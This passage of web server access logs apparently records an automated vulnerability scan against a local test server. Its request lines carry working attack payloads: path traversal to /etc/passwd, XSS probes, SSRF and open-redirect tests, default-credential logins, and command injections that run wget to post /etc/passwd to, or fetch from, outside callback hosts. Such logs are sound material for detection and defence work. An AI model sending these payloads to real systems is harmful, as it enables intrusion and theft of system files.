+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zimbraAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /client/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backend/backend/auth/signin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nifi-api/access/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /VirtualEms/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"SPOOLDIR=test\x22.system(id).\x22&recheck=Recheck","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Orion/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/pdf-invoices/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/mstore-api/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"IWP_JSON_PREFIX","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%EF%BD%B0example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Nacos-Server", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/88 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/histograms?h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&fmt=plot_cdf&log_scale=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/anycomment/v1/auth/wordpress?redirect=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /files/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"_token={{token}}&postback=1&login=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /backend/backend/auth/signin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebConsole/api/security/auth/loginServers HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xampp/phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20ca2tuc8smpv1g2s80ca0npremgb91e4xc.oast.pro) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"username=root&password=123%22%2C%22%246%24%24%22%29%29%3Bimport+os%3Bos.system%28%22wget+http%3A%2F%2Fca2tuc8smpv1g2s80ca0ffgqp8qwo6gxu.oast.pro%22%29%3Bprint%28crypt.crypt%28%22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth/change HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /./../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.004","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin//phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Images/Remote?imageUrl=http://ca2tuc8smpv1g2s80ca07foijd9pedzpn.oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%3C%3E//example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Nacos-Server", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/89 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5C../ssl/yaws-key.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /icons/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/forgetpswd.php?loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"_token={{token}}&postback=1&login=admin&password=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /backend/backend/auth/signin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sysadmin/phpMyAdmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"username=root&password=123%22%2C%22%246%24%24%22%29%29%3Bimport+os%3Bos.system%28%22wget+http%3A%2F%2Fca2tuc8smpv1g2s80ca0418w1trku1sra.oast.pro%22%29%3Bprint%28crypt.crypt%28%22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Items/RemoteSearch/Image?ImageUrl=http://ca2tuc8smpv1g2s80ca0ytpijg9g1hzaq.oast.pro&ProviderName=TheMovieDB HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/pkg?command= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mobile/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/90 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /website/lang/en_US?r=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/auth/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"{\x22dashboard\x22:{\x22annotations\x22:{\x22list\x22:[{\x22name\x22:\x22Annotations & Alerts\x22,\x22enable\x22:true,\x22iconColor\x22:\x22rgba(0, 211, 255, 1)\x22,\x22type\x22:\x22dashboard\x22,\x22builtIn\x22:1,\x22hide\x22:true}]},\x22editable\x22:true,\x22gnetId\x22:null,\x22graphTooltip\x22:0,\x22id\x22:null,\x22links\x22:[],\x22panels\x22:[],\x22schemaVersion\x22:18,\x22snapshot\x22:{\x22originalUrl\x22:\x22javascript:alert('Revers3c')\x22,\x22timestamp\x22:\x222020-03-30T01:24:44.529Z\x22},\x22style\x22:\x22dark\x22,\x22tags\x22:[],\x22templating\x22:{\x22list\x22:[]},\x22time\x22:{\x22from\x22:null,\x22to\x22:\x222020-03-30T01:24:53.549Z\x22,\x22raw\x22:{\x22from\x22:\x226h\x22,\x22to\x22:\x22now\x22}},\x22timepicker\x22:{\x22refresh_intervals\x22:[\x225s\x22,\x2210s\x22,\x2230s\x22,\x221m\x22,\x225m\x22,\x2215m\x22,\x2230m\x22,\x221h\x22,\x222h\x22,\x221d\x22],\x22time_options\x22:[\x225m\x22,\x2215m\x22,\x221h\x22,\x226h\x22,\x2212h\x22,\x2224h\x22,\x222d\x22,\x227d\x22,\x2230d\x22]},\x22timezone\x22:\x22\x22,\x22title\x22:\x22Dashboard\x22,\x22uid\x22:null,\x22version\x22:0},\x22name\x22:\x22Dashboard\x22,\x22expires\x22:0}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/snapshots HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /my.ppk HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", 